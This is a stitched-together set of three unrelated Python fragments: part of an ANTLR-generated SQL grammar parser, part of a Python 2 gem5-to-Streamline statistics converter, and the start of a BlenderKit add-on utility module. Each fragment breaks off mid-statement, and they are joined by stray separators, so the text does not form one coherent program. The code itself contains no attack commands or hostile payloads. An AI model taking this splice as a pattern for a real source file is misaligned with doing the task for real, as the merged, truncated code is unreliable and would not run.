localctx = SQLGramaticaParser.InsertIntoContext(self, self._ctx, self.state)
self.enterRule(localctx, 58, self.RULE_insertInto)
self._la = 0 # Token type
try:
self.enterOuterAlt(localctx, 1)
self.state = 406
self.match(SQLGramaticaParser.INSERT)
self.state = 407
self.match(SQLGramaticaParser.INTO)
self.state = 408
self.match(SQLGramaticaParser.IDX)
self.state = 409
self.match(SQLGramaticaParser.T__2)
self.state = 410
self.match(SQLGramaticaParser.IDX)
self.state = 415
self._errHandler.sync(self)
_la = self._input.LA(1)
while _la==SQLGramaticaParser.T__4:
self.state = 411
self.match(SQLGramaticaParser.T__4)
self.state = 412
self.match(SQLGramaticaParser.IDX)
self.state = 417
self._errHandler.sync(self)
_la = self._input.LA(1)
self.state = 418
self.match(SQLGramaticaParser.T__3)
self.state = 419
self.match(SQLGramaticaParser.VALUES)
self.state = 420
self.match(SQLGramaticaParser.T__2)
self.state = 421
self.literal()
self.state = 426
self._errHandler.sync(self)
_la = self._input.LA(1)
while _la==SQLGramaticaParser.T__4:
self.state = 422
self.match(SQLGramaticaParser.T__4)
self.state = 423
self.literal()
self.state = 428
self._errHandler.sync(self)
_la = self._input.LA(1)
self.state = 429
self.match(SQLGramaticaParser.T__3)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class UpdateSetContext(ParserRuleContext):
def __init__(self, parser, parent=None, invokingState=-1):
super(SQLGramaticaParser.UpdateSetContext, self).__init__(parent, invokingState)
self.parser = parser
def UPDATE(self):
return self.getToken(SQLGramaticaParser.UPDATE, 0)
def IDX(self, i=None):
if i is None:
return self.getTokens(SQLGramaticaParser.IDX)
else:
return self.getToken(SQLGramaticaParser.IDX, i)
def SET(self):
return self.getToken(SQLGramaticaParser.SET, 0)
def tipo(self, i=None):
if i is None:
return self.getTypedRuleContexts(SQLGramaticaParser.TipoContext)
else:
return self.getTypedRuleContext(SQLGramaticaParser.TipoContext,i)
def WHERE(self):
return self.getToken(SQLGramaticaParser.WHERE, 0)
def exp(self):
return self.getTypedRuleContext(SQLGramaticaParser.ExpContext,0)
def getRuleIndex(self):
return SQLGramaticaParser.RULE_updateSet
def enterRule(self, listener):
if hasattr(listener, "enterUpdateSet"):
listener.enterUpdateSet(self)
def exitRule(self, listener):
if hasattr(listener, "exitUpdateSet"):
listener.exitUpdateSet(self)
def accept(self, visitor):
if hasattr(visitor, "visitUpdateSet"):
return visitor.visitUpdateSet(self)
else:
return visitor.visitChildren(self)
def updateSet(self):
localctx = SQLGramaticaParser.UpdateSetContext(self, self._ctx, self.state)
self.enterRule(localctx, 60, self.RULE_updateSet)
self._la = 0 # Token type
try:
self.enterOuterAlt(localctx, 1)
self.state = 431
self.match(SQLGramaticaParser.UPDATE)
self.state = 432
self.match(SQLGramaticaParser.IDX)
self.state = 433
self.match(SQLGramaticaParser.SET)
self.state = 434
self.match(SQLGramaticaParser.IDX)
self.state = 435
self.match(SQLGramaticaParser.T__5)
self.state = 436
self.tipo()
self.state = 441
self._errHandler.sync(self)
_la = self._input.LA(1)
while _la==SQLGramaticaParser.T__4:
self.state = 437
self.match(SQLGramaticaParser.T__4)
self.state = 438
self.tipo()
self.state = 443
self._errHandler.sync(self)
_la = self._input.LA(1)
self.state = 446
self._errHandler.sync(self)
_la = self._input.LA(1)
if _la==SQLGramaticaParser.WHERE:
self.state = 444
self.match(SQLGramaticaParser.WHERE)
self.state = 445
self.exp()
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class DeleteFromContext(ParserRuleContext):
def __init__(self, parser, parent=None, invokingState=-1):
super(SQLGramaticaParser.DeleteFromContext, self).__init__(parent, invokingState)
self.parser = parser
def DELETE(self):
return self.getToken(SQLGramaticaParser.DELETE, 0)
def FROM(self):
return self.getToken(SQLGramaticaParser.FROM, 0)
def IDX(self):
return self.getToken(SQLGramaticaParser.IDX, 0)
def WHERE(self):
return self.getToken(SQLGramaticaParser.WHERE, 0)
def exp(self):
return self.getTypedRuleContext(SQLGramaticaParser.ExpContext,0)
def getRuleIndex(self):
return SQLGramaticaParser.RULE_deleteFrom
def enterRule(self, listener):
if hasattr(listener, "enterDeleteFrom"):
listener.enterDeleteFrom(self)
def exitRule(self, listener):
if hasattr(listener, "exitDeleteFrom"):
listener.exitDeleteFrom(self)
def accept(self, visitor):
if hasattr(visitor, "visitDeleteFrom"):
return visitor.visitDeleteFrom(self)
else:
return visitor.visitChildren(self)
def deleteFrom(self):
localctx = SQLGramaticaParser.DeleteFromContext(self, self._ctx, self.state)
self.enterRule(localctx, 62, self.RULE_deleteFrom)
self._la = 0 # Token type
try:
self.enterOuterAlt(localctx, 1)
self.state = 448
self.match(SQLGramaticaParser.DELETE)
self.state = 449
self.match(SQLGramaticaParser.FROM)
self.state = 450
self.match(SQLGramaticaParser.IDX)
self.state = 453
self._errHandler.sync(self)
_la = self._input.LA(1)
if _la==SQLGramaticaParser.WHERE:
self.state = 451
self.match(SQLGramaticaParser.WHERE)
self.state = 452
self.exp()
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class SelectFromContext(ParserRuleContext):
def __init__(self, parser, parent=None, invokingState=-1):
super(SQLGramaticaParser.SelectFromContext, self).__init__(parent, invokingState)
self.parser = parser
def SELECT(self):
return self.getToken(SQLGramaticaParser.SELECT, 0)
def sep(self):
return self.getTypedRuleContext(SQLGramaticaParser.SepContext,0)
def FROM(self):
return self.getToken(SQLGramaticaParser.FROM, 0)
def IDX(self):
return self.getToken(SQLGramaticaParser.IDX, 0)
def WHERE(self):
return self.getToken(SQLGramaticaParser.WHERE, 0)
def exp(self, i=None):
if i is None:
return self.getTypedRuleContexts(SQLGramaticaParser.ExpContext)
else:
return self.getTypedRuleContext(SQLGramaticaParser.ExpContext,i)
def ORDER(self):
return self.getToken(SQLGramaticaParser.ORDER, 0)
def BY(self):
return self.getToken(SQLGramaticaParser.BY, 0)
def ASC(self, i=None):
if i is None:
return self.getTokens(SQLGramaticaParser.ASC)
else:
return self.getToken(SQLGramaticaParser.ASC, i)
def DESC(self, i=None):
if i is None:
return self.getTokens(SQLGramaticaParser.DESC)
else:
return self.getToken(SQLGramaticaParser.DESC, i)
def getRuleIndex(self):
return SQLGramaticaParser.RULE_selectFrom
def enterRule(self, listener):
if hasattr(listener, "enterSelectFrom"):
listener.enterSelectFrom(self)
def exitRule(self, listener):
if hasattr(listener, "exitSelectFrom"):
listener.exitSelectFrom(self)
def accept(self, visitor):
if hasattr(visitor, "visitSelectFrom"):
return visitor.visitSelectFrom(self)
else:
return visitor.visitChildren(self)
def selectFrom(self):
localctx = SQLGramaticaParser.SelectFromContext(self, self._ctx, self.state)
self.enterRule(localctx, 64, self.RULE_selectFrom)
self._la = 0 # Token type
try:
self.enterOuterAlt(localctx, 1)
self.state = 455
self.match(SQLGramaticaParser.SELECT)
self.state = 456
self.sep()
self.state = 457
self.match(SQLGramaticaParser.FROM)
self.state = 458
self.match(SQLGramaticaParser.IDX)
self.state = 479
self._errHandler.sync(self)
_la = self._input.LA(1)
if _la==SQLGramaticaParser.WHERE:
self.state = 459
self.match(SQLGramaticaParser.WHERE)
self.state = 460
self.exp()
self.state = 477
self._errHandler.sync(self)
token = self._input.LA(1)
if token in [SQLGramaticaParser.ORDER]:
self.state = 461
self.match(SQLGramaticaParser.ORDER)
self.state = 462
self.match(SQLGramaticaParser.BY)
self.state = 463
self.exp()
self.state = 464
self.match(SQLGramaticaParser.ASC)
pass
elif token in [SQLGramaticaParser.DESC]:
self.state = 466
self.match(SQLGramaticaParser.DESC)
self.state = 474
self._errHandler.sync(self)
_la = self._input.LA(1)
while _la==SQLGramaticaParser.T__4 or _la==SQLGramaticaParser.DESC:
self.state = 472
self._errHandler.sync(self)
token = self._input.LA(1)
if token in [SQLGramaticaParser.T__4]:
self.state = 467
self.match(SQLGramaticaParser.T__4)
self.state = 468
self.exp()
self.state = 469
self.match(SQLGramaticaParser.ASC)
pass
elif token in [SQLGramaticaParser.DESC]:
self.state = 471
self.match(SQLGramaticaParser.DESC)
pass
else:
raise NoViableAltException(self)
self.state = 476
self._errHandler.sync(self)
_la = self._input.LA(1)
pass
elif token in [SQLGramaticaParser.EOF, SQLGramaticaParser.T__1, SQLGramaticaParser.CREATE, SQLGramaticaParser.ALTER, SQLGramaticaParser.DROP, SQLGramaticaParser.SHOW, SQLGramaticaParser.USE, SQLGramaticaParser.INSERT, SQLGramaticaParser.SELECT, SQLGramaticaParser.UPDATE, SQLGramaticaParser.DELETE]:
pass
else:
pass
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class SepContext(ParserRuleContext):
def __init__(self, parser, parent=None, invokingState=-1):
super(SQLGramaticaParser.SepContext, self).__init__(parent, invokingState)
self.parser = parser
def IDX(self, i=None):
if i is None:
return self.getTokens(SQLGramaticaParser.IDX)
else:
return self.getToken(SQLGramaticaParser.IDX, i)
def getRuleIndex(self):
return SQLGramaticaParser.RULE_sep
def enterRule(self, listener):
if hasattr(listener, "enterSep"):
listener.enterSep(self)
def exitRule(self, listener):
if hasattr(listener, "exitSep"):
listener.exitSep(self)
def accept(self, visitor):
if hasattr(visitor, "visitSep"):
return visitor.visitSep(self)
else:
return visitor.visitChildren(self)
def sep(self):
localctx = SQLGramaticaParser.SepContext(self, self._ctx, self.state)
self.enterRule(localctx, 66, self.RULE_sep)
self._la = 0 # Token type
try:
self.state = 490
self._errHandler.sync(self)
token = self._input.LA(1)
if token in [SQLGramaticaParser.T__6]:
self.enterOuterAlt(localctx, 1)
self.state = 481
self.match(SQLGramaticaParser.T__6)
pass
elif token in [SQLGramaticaParser.IDX]:
self.enterOuterAlt(localctx, 2)
self.state = 482
self.match(SQLGramaticaParser.IDX)
self.state = 487
self._errHandler.sync(self)
_la = self._input.LA(1)
while _la==SQLGramaticaParser.T__4:
self.state = 483
self.match(SQLGramaticaParser.T__4)
self.state = 484
self.match(SQLGramaticaParser.IDX)
self.state = 489
self._errHandler.sync(self)
_la = self._input.LA(1)
pass
else:
raise NoViableAltException(self)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Rel_opContext(ParserRuleContext):
def __init__(self, parser, parent=None, invokingState=-1):
super(SQLGramaticaParser.Rel_opContext, self).__init__(parent, invokingState)
self.parser = parser
def getRuleIndex(self):
return SQLGramaticaParser.RULE_rel_op
def enterRule(self, listener):
if hasattr(listener, "enterRel_op"):
listener.enterRel_op(self)
def exitRule(self, listener):
if hasattr(listener, "exitRel_op"):
listener.exitRel_op(self)
def accept(self, visitor):
if hasattr(visitor, "visitRel_op"):
return visitor.visitRel_op(self)
else:
return visitor.visitChildren(self)
def rel_op(self):
localctx = SQLGramaticaParser.Rel_opContext(self, self._ctx, self.state)
self.enterRule(localctx, 68, self.RULE_rel_op)
self._la = 0 # Token type
try:
self.enterOuterAlt(localctx, 1)
self.state = 492
_la = self._input.LA(1)
if not((((_la) & ~0x3f) == 0 and ((1 << _la) & ((1 << SQLGramaticaParser.T__5) | (1 << SQLGramaticaParser.T__7) | (1 << SQLGramaticaParser.T__8) | (1 << SQLGramaticaParser.T__9) | (1 << SQLGramaticaParser.T__10))) != 0)):
self._errHandler.recoverInline(self)
else:
self._errHandler.reportMatch(self)
self.consume()
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Eq_opContext(ParserRuleContext):
def __init__(self, parser, parent=None, invokingState=-1):
super(SQLGramaticaParser.Eq_opContext, self).__init__(parent, invokingState)
self.parser = parser
def getRuleIndex(self):
return SQLGramaticaParser.RULE_eq_op
def enterRule(self, listener):
if hasattr(listener, "enterEq_op"):
listener.enterEq_op(self)
def exitRule(self, listener):
if hasattr(listener, "exitEq_op"):
listener.exitEq_op(self)
def accept(self, visitor):
if hasattr(visitor, "visitEq_op"):
return visitor.visitEq_op(self)
else:
return visitor.visitChildren(self)
def eq_op(self):
localctx = SQLGramaticaParser.Eq_opContext(self, self._ctx, self.state)
self.enterRule(localctx, 70, self.RULE_eq_op)
self._la = 0 # Token type
try:
self.enterOuterAlt(localctx, 1)
self.state = 494
_la = self._input.LA(1)
if not(_la==SQLGramaticaParser.T__11 or _la==SQLGramaticaParser.T__12):
self._errHandler.recoverInline(self)
else:
self._errHandler.reportMatch(self)
self.consume()
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Add_opContext(ParserRuleContext):
def __init__(self, parser, parent=None, invokingState=-1):
super(SQLGramaticaParser.Add_opContext, self).__init__(parent, invokingState)
self.parser = parser
def getRuleIndex(self):
return SQLGramaticaParser.RULE_add_op
def enterRule(self, listener):
if hasattr(listener, "enterAdd_op"):
listener.enterAdd_op(self)
def exitRule(self, listener):
if hasattr(listener, "exitAdd_op"):
listener.exitAdd_op(self)
def accept(self, visitor):
if hasattr(visitor, "visitAdd_op"):
return visitor.visitAdd_op(self)
else:
return visitor.visitChildren(self)
def add_op(self):
localctx = SQLGramaticaParser.Add_opContext(self, self._ctx, self.state)
self.enterRule(localctx, 72, self.RULE_add_op)
self._la = 0 # Token type
try:
self.enterOuterAlt(localctx, 1)
self.state = 496
_la = self._input.LA(1)
if not(_la==SQLGramaticaParser.T__0 or _la==SQLGramaticaParser.T__13):
self._errHandler.recoverInline(self)
else:
self._errHandler.reportMatch(self)
self.consume()
except RecognitionException as re:
localctx.exception | |
len(unified_event_list)
for process in process_list:
if process.pid > 9990: # fix up framebuffer ticks
process.tick = start_tick
print process.uid, process.pid, process.tgid, \
process.task_name, str(process.tick)
for thread in process.children:
if thread.pid > 9990:
thread.tick = start_tick
print "\t", thread.uid, thread.pid, thread.tgid, \
thread.task_name, str(thread.tick)
end_tick = tick
print "Start tick:", start_tick
print "End tick: ", end_tick
print ""
return
def initOutput(output_path):
if not os.path.exists(output_path):
os.mkdir(output_path)
def ticksToNs(tick):
if ticks_in_ns < 0:
print "ticks_in_ns not set properly!"
sys.exit(1)
return tick / ticks_in_ns
def writeXmlFile(xml, filename):
f = open(filename, "w")
txt = ET.tostring(xml)
f.write(minidom.parseString(txt).toprettyxml())
f.close()
# StatsEntry that contains individual statistics
class StatsEntry(object):
def __init__(self, name, group, group_index, per_cpu, key):
# Full name of statistics
self.name = name
# Streamline group name that statistic will belong to
self.group = group
# Index of statistics within group (used to change colors within groups)
self.group_index = group_index
# Shorter name with "system" stripped off
# and symbols converted to alphanumerics
self.short_name = re.sub("system\.", "", name)
self.short_name = re.sub(":", "_", name)
# Regex for this stat (string version used to construct union regex)
self.regex_string = "^" + name + "\s+([\d\.]+)"
self.regex = re.compile("^" + name + "\s+([\d\.e\-]+)\s+# (.*)$", re.M)
self.description = ""
# Whether this stat is use per CPU or not
self.per_cpu = per_cpu
# Key used in .apc protocol (as described in captured.xml)
self.key = key
# List of values of stat per timestamp
self.values = []
# Whether this stat has been found for the current timestamp
self.found = False
# Whether this stat has been found at least once
# (to suppress too many warnings)
self.not_found_at_least_once = False
# Field used to hold ElementTree subelement for this stat
self.ET_element = None
# Create per-CPU stat name and regex, etc.
if self.per_cpu:
self.per_cpu_regex_string = []
self.per_cpu_regex = []
self.per_cpu_name = []
self.per_cpu_found = []
for i in range(num_cpus):
if num_cpus > 1:
per_cpu_name = re.sub("#", str(i), self.name)
else:
per_cpu_name = re.sub("#", "", self.name)
self.per_cpu_name.append(per_cpu_name)
print "\t", per_cpu_name
self.per_cpu_regex_string.\
append("^" + per_cpu_name + "\s+[\d\.]+")
self.per_cpu_regex.append(re.compile("^" + per_cpu_name + \
"\s+([\d\.e\-]+)\s+# (.*)$", re.M))
self.values.append([])
self.per_cpu_found.append(False)
def append_value(self, val, per_cpu_index = None):
if self.per_cpu:
self.values[per_cpu_index].append(str(val))
else:
self.values.append(str(val))
# Global stats object that contains the list of stats entries
# and other utility functions
class Stats(object):
def __init__(self):
self.stats_list = []
self.tick_list = []
self.next_key = 1
def register(self, name, group, group_index, per_cpu):
print "registering stat:", name, "group:", group, group_index
self.stats_list.append(StatsEntry(name, group, group_index, per_cpu, \
self.next_key))
self.next_key += 1
# Union of all stats to accelerate parsing speed
def createStatsRegex(self):
regex_strings = [];
print "\nnum entries in stats_list", len(self.stats_list)
for entry in self.stats_list:
if entry.per_cpu:
for i in range(num_cpus):
regex_strings.append(entry.per_cpu_regex_string[i])
else:
regex_strings.append(entry.regex_string)
self.regex = re.compile('|'.join(regex_strings))
def registerStats(config_file):
print "==============================="
print "Parsing stats config.ini file..."
print config_file
print "==============================="
config = ConfigParser()
if not config.read(config_file):
print "ERROR: config file '", config_file, "' not found!"
sys.exit(1)
print "\nRegistering Stats..."
stats = Stats()
per_cpu_stat_groups = config.options('PER_CPU_STATS')
for group in per_cpu_stat_groups:
i = 0
per_cpu_stats_list = config.get('PER_CPU_STATS', group).split('\n')
for item in per_cpu_stats_list:
if item:
stats.register(item, group, i, True)
i += 1
per_l2_stat_groups = config.options('PER_L2_STATS')
for group in per_l2_stat_groups:
i = 0
per_l2_stats_list = config.get('PER_L2_STATS', group).split('\n')
for item in per_l2_stats_list:
if item:
for l2 in range(num_l2):
if num_l2 > 1:
name = re.sub("#", str(l2), item)
else:
name = re.sub("#", "", item)
stats.register(name, group, i, False)
i += 1
other_stat_groups = config.options('OTHER_STATS')
for group in other_stat_groups:
i = 0
other_stats_list = config.get('OTHER_STATS', group).split('\n')
for item in other_stats_list:
if item:
stats.register(item, group, i, False)
i += 1
stats.createStatsRegex()
return stats
# Parse and read in gem5 stats file
# Streamline counters are organized per CPU
def readGem5Stats(stats, gem5_stats_file):
print "\n==============================="
print "Parsing gem5 stats file..."
print gem5_stats_file
print "===============================\n"
ext = os.path.splitext(gem5_stats_file)[1]
window_start_regex = \
re.compile("^---------- Begin Simulation Statistics ----------")
window_end_regex = \
re.compile("^---------- End Simulation Statistics ----------")
final_tick_regex = re.compile("^final_tick\s+(\d+)")
global ticks_in_ns
sim_freq_regex = re.compile("^sim_freq\s+(\d+)")
sim_freq = -1
try:
if ext == ".gz":
f = gzip.open(gem5_stats_file, "r")
else:
f = open(gem5_stats_file, "r")
except:
print "ERROR opening stats file", gem5_stats_file, "!"
sys.exit(1)
stats_not_found_list = stats.stats_list[:]
window_num = 0
while (True):
error = False
try:
line = f.readline()
except IOError:
print ""
print "WARNING: IO error in stats file"
print "(gzip stream not closed properly?)...continuing for now"
error = True
if not line:
break
# Find out how many gem5 ticks in 1ns
if sim_freq < 0:
m = sim_freq_regex.match(line)
if m:
sim_freq = int(m.group(1)) # ticks in 1 sec
ticks_in_ns = int(sim_freq / 1e9)
print "Simulation frequency found! 1 tick == %e sec\n" \
% (1.0 / sim_freq)
# Final tick in gem5 stats: current absolute timestamp
m = final_tick_regex.match(line)
if m:
tick = int(m.group(1))
if tick > end_tick:
break
stats.tick_list.append(tick)
if (window_end_regex.match(line) or error):
if args.verbose:
print "new window"
for stat in stats.stats_list:
if stat.per_cpu:
for i in range(num_cpus):
if not stat.per_cpu_found[i]:
if not stat.not_found_at_least_once:
print "WARNING: stat not found in window #", \
window_num, ":", stat.per_cpu_name[i]
print "suppressing further warnings for " + \
"this stat"
stat.not_found_at_least_once = True
stat.values[i].append(str(0))
stat.per_cpu_found[i] = False
else:
if not stat.found:
if not stat.not_found_at_least_once:
print "WARNING: stat not found in window #", \
window_num, ":", stat.name
print "suppressing further warnings for this stat"
stat.not_found_at_least_once = True
stat.values.append(str(0))
stat.found = False
stats_not_found_list = stats.stats_list[:]
window_num += 1
if error:
break
# Do a single regex of the union of all stats first for speed
if stats.regex.match(line):
# Then loop through only the stats we haven't seen in this window
for stat in stats_not_found_list[:]:
if stat.per_cpu:
for i in range(num_cpus):
m = stat.per_cpu_regex[i].match(line)
if m:
if stat.name == "ipc":
value = str(int(float(m.group(1)) * 1000))
else:
value = str(int(float(m.group(1))))
if args.verbose:
print stat.per_cpu_name[i], value
stat.values[i].append(value)
stat.per_cpu_found[i] = True
all_found = True
for j in range(num_cpus):
if not stat.per_cpu_found[j]:
all_found = False
if all_found:
stats_not_found_list.remove(stat)
if stat.description == "":
stat.description = m.group(2)
else:
m = stat.regex.match(line)
if m:
value = str(int(float(m.group(1))))
if args.verbose:
print stat.name, value
stat.values.append(value)
stat.found = True
stats_not_found_list.remove(stat)
if stat.description == "":
stat.description = m.group(2)
f.close()
# Create session.xml file in .apc folder
def doSessionXML(output_path):
session_file = output_path + "/session.xml"
xml = ET.Element("session")
xml.set("version", "1")
xml.set("call_stack_unwinding", "no")
xml.set("parse_debug_info", "no")
xml.set("high_resolution", "yes")
xml.set("buffer_mode", "streaming")
xml.set("sample_rate", "low")
# Setting duration to zero for now. Doesn't affect visualization.
xml.set("duration", "0")
xml.set("target_host", "")
xml.set("target_port", "8080")
writeXmlFile(xml, session_file)
# Create captured.xml file in .apc folder
def doCapturedXML(output_path, stats):
captured_file = output_path + "/captured.xml"
xml = ET.Element("captured")
xml.set("version", "1")
xml.set("protocol", "17")
xml.set("backtrace_processing", "none")
target = ET.SubElement(xml, "target")
target.set("name", "gem5")
target.set("sample_rate", "1000")
target.set("cores", str(num_cpus))
counters = ET.SubElement(xml, "counters")
for stat in stats.stats_list:
s = ET.SubElement(counters, "counter")
stat_name = re.sub("\.", "_", stat.short_name)
stat_name = re.sub("#", "", stat_name)
s.set("title", stat.group)
s.set("name", stat_name)
s.set("color", "0x00000000")
s.set("key", "0x%08x" % stat.key)
s.set("type", stat_name)
s.set("event", "0x00000000")
if stat.per_cpu:
s.set("per_cpu", "yes")
else:
s.set("per_cpu", "no")
s.set("display", "")
s.set("units", "")
s.set("average_selection", "no")
s.set("description", stat.description)
writeXmlFile(xml, captured_file)
# Writes out Streamline cookies (unique IDs per process/thread)
def writeCookiesThreads(blob):
thread_list = []
for process in process_list:
if process.uid > 0:
print "cookie", process.task_name, process.uid
writeBinary(blob, cookieNameFrame(process.uid, process.task_name))
# pid and tgid need to be positive values -- no longer true?
for thread in process.children:
thread_list.append(thread)
# Threads need to be sorted in timestamp order
thread_list.sort(key = lambda x: x.tick)
for thread in thread_list:
print "thread", thread.task_name, (ticksToNs(thread.tick)),\
thread.tgid, thread.pid
writeBinary(blob, threadNameFrame(ticksToNs(thread.tick),\
thread.pid, thread.task_name))
# Writes context switch info as Streamline scheduling events
def writeSchedEvents(blob):
for cpu in range(num_cpus):
for event in event_list[cpu]:
timestamp = ticksToNs(event.tick)
pid = event.task.tgid
tid = event.task.pid
if process_dict.has_key(event.task.tgid):
cookie = process_dict[event.task.tgid].uid
else:
cookie = 0
# State:
# 0: waiting on other event besides I/O
# 1: Contention/pre-emption
# 2: Waiting on I/O
# 3: Waiting on mutex
# Hardcoding to 0 for now. Other states not implemented yet.
state = 0
if args.verbose:
print cpu, timestamp, pid, tid, cookie
writeBinary(blob,\
schedSwitchFrame(cpu, timestamp, pid, tid, cookie, state))
# Writes selected gem5 statistics as Streamline counters
def writeCounters(blob, stats):
timestamp_list = []
for tick in stats.tick_list:
if tick > end_tick:
break
timestamp_list.append(ticksToNs(tick))
for | |
<reponame>BlazesRus/Bforartists<gh_stars>1-10
# ##### BEGIN GPL LICENSE BLOCK #####
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software Foundation,
# Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
#
# ##### END GPL LICENSE BLOCK #####
if "bpy" in locals():
import imp
imp.reload(paths)
else:
from blenderkit import paths, categories
import bpy
from mathutils import Vector
import json
import os
import requests
def activate(ob):
bpy.ops.object.select_all(action='DESELECT')
ob.select_set(True)
bpy.context.view_layer.objects.active = ob
def selection_get():
aob = bpy.context.active_object
selobs = bpy.context.selected_objects
return (aob, selobs)
def selection_set(sel):
bpy.ops.object.select_all(action='DESELECT')
bpy.context.view_layer.objects.active = sel[0]
for ob in sel[1]:
ob.select_set(True)
def get_active_model():
if hasattr(bpy.context, 'active_object'):
ob = bpy.context.active_object
while ob.parent is not None:
ob = ob.parent
return ob
return None
def get_selected_models():
obs = bpy.context.selected_objects[:]
done = {}
parents = []
for ob in obs:
if ob not in done:
while ob.parent is not None and ob not in done:
done[ob] = True
ob = ob.parent
if ob not in parents and ob not in done:
if ob.blenderkit.name != '':
parents.append(ob)
done[ob] = True
return parents
def get_search_props():
scene = bpy.context.scene
uiprops = scene.blenderkitUI
props = None
if uiprops.asset_type == 'MODEL':
if not hasattr(scene, 'blenderkit_models'):
return;
props = scene.blenderkit_models
if uiprops.asset_type == 'SCENE':
if not hasattr(scene, 'blenderkit_scene'):
return;
props = scene.blenderkit_scene
if uiprops.asset_type == 'MATERIAL':
if not hasattr(scene, 'blenderkit_mat'):
return;
props = scene.blenderkit_mat
if uiprops.asset_type == 'TEXTURE':
if not hasattr(scene, 'blenderkit_tex'):
return;
# props = scene.blenderkit_tex
if uiprops.asset_type == 'BRUSH':
if not hasattr(scene, 'blenderkit_brush'):
return;
props = scene.blenderkit_brush
return props
def get_active_asset():
scene = bpy.context.scene
ui_props = scene.blenderkitUI
if ui_props.asset_type == 'MODEL':
if bpy.context.active_object is not None:
ob = get_active_model()
return ob
if ui_props.asset_type == 'SCENE':
return bpy.context.scene
elif ui_props.asset_type == 'MATERIAL':
if bpy.context.active_object is not None and bpy.context.active_object.active_material is not None:
return bpy.context.active_object.active_material
elif ui_props.asset_type == 'TEXTURE':
return None
elif ui_props.asset_type == 'BRUSH':
b = get_active_brush()
if b is not None:
return b
return None
def get_upload_props():
scene = bpy.context.scene
ui_props = scene.blenderkitUI
if ui_props.asset_type == 'MODEL':
if bpy.context.active_object is not None:
ob = get_active_model()
return ob.blenderkit
if ui_props.asset_type == 'SCENE':
s = bpy.context.scene
return s.blenderkit
elif ui_props.asset_type == 'MATERIAL':
if bpy.context.active_object is not None and bpy.context.active_object.active_material is not None:
return bpy.context.active_object.active_material.blenderkit
elif ui_props.asset_type == 'TEXTURE':
return None
elif ui_props.asset_type == 'BRUSH':
b = get_active_brush()
if b is not None:
return b.blenderkit
return None
def previmg_name(index, fullsize=False):
if not fullsize:
return '.bkit_preview_' + str(index).zfill(2)
else:
return '.bkit_preview_full_' + str(index).zfill(2)
def get_active_brush():
context = bpy.context
brush = None
if context.sculpt_object:
brush = context.tool_settings.sculpt.brush
elif context.image_paint_object: # could be just else, but for future possible more types...
brush = context.tool_settings.image_paint.brush
return brush
def load_prefs():
user_preferences = bpy.context.preferences.addons['blenderkit'].preferences
# if user_preferences.api_key == '':
fpath = paths.BLENDERKIT_SETTINGS_FILENAME
if os.path.exists(fpath):
with open(fpath, 'r') as s:
prefs = json.load(s)
user_preferences.api_key = prefs['API_key']
user_preferences.global_dir = prefs['global_dir']
def save_prefs(self, context):
# print(type(context),type(bpy.context))
if not bpy.app.background and hasattr(bpy.context, 'view_layer'):
user_preferences = bpy.context.preferences.addons['blenderkit'].preferences
if user_preferences.api_key != '':
if len(user_preferences.api_key)>35:
prefs = {
'API_key': user_preferences.api_key,
'global_dir': user_preferences.global_dir,
}
# user_preferences.api_key = user_preferences.api_key.strip()
fpath = paths.BLENDERKIT_SETTINGS_FILENAME
f = open(fpath, 'w')
with open(fpath, 'w') as s:
json.dump(prefs, s)
bpy.ops.wm.save_userpref()
else:
# reset the api key in case the user writes some nonsense, e.g. a search string instead of the Key
user_preferences.api_key = ''
props = get_search_props()
props.report = 'Please paste a correct API Key.'
def load_categories():
categories.copy_categories()
tempdir = paths.get_temp_dir()
categories_filepath = os.path.join(tempdir, 'categories.json')
wm = bpy.context.window_manager
with open(categories_filepath, 'r') as catfile:
wm['bkit_categories'] = json.load(catfile)
wm['active_category'] = {
'MODEL': ['model'],
'SCENE': ['scene'],
'MATERIAL': ['material'],
'BRUSH': ['brush'],
}
def get_hidden_image(tpath, bdata_name, force_reload=False):
hidden_name = '.%s' % bdata_name
img = bpy.data.images.get(hidden_name)
if tpath.startswith('//'):
tpath = bpy.path.abspath(tpath)
gap = '\n\n\n'
en = '\n'
if img == None or (img.filepath != tpath):
if tpath.startswith('//'):
tpath = bpy.path.abspath(tpath)
if not os.path.exists(tpath) or tpath == '':
tpath = paths.get_addon_thumbnail_path('thumbnail_notready.jpg')
if img is None:
img = bpy.data.images.load(tpath)
img.name = hidden_name
else:
if img.filepath != tpath:
if img.packed_file is not None:
img.unpack(method='USE_ORIGINAL')
img.filepath = tpath
img.reload()
elif force_reload:
if img.packed_file is not None:
img.unpack(method='USE_ORIGINAL')
img.reload()
return img
def get_thumbnail(name):
p = paths.get_addon_thumbnail_path(name)
name = '.%s' % name
img = bpy.data.images.get(name)
if img == None:
img = bpy.data.images.load(p)
img.name = name
img.name = name
return img
def get_brush_props(context):
brush = get_active_brush()
if brush is not None:
return brush.blenderkit
return None
def pprint(data):
print(json.dumps(data, indent=4, sort_keys=True))
def get_hierarchy(ob):
obs = []
doobs = [ob]
while len(doobs) > 0:
o = doobs.pop()
doobs.extend(o.children)
obs.append(o)
return obs
def get_bounds_snappable(obs, use_modifiers=False):
# progress('getting bounds of object(s)')
parent = obs[0]
while parent.parent is not None:
parent = parent.parent
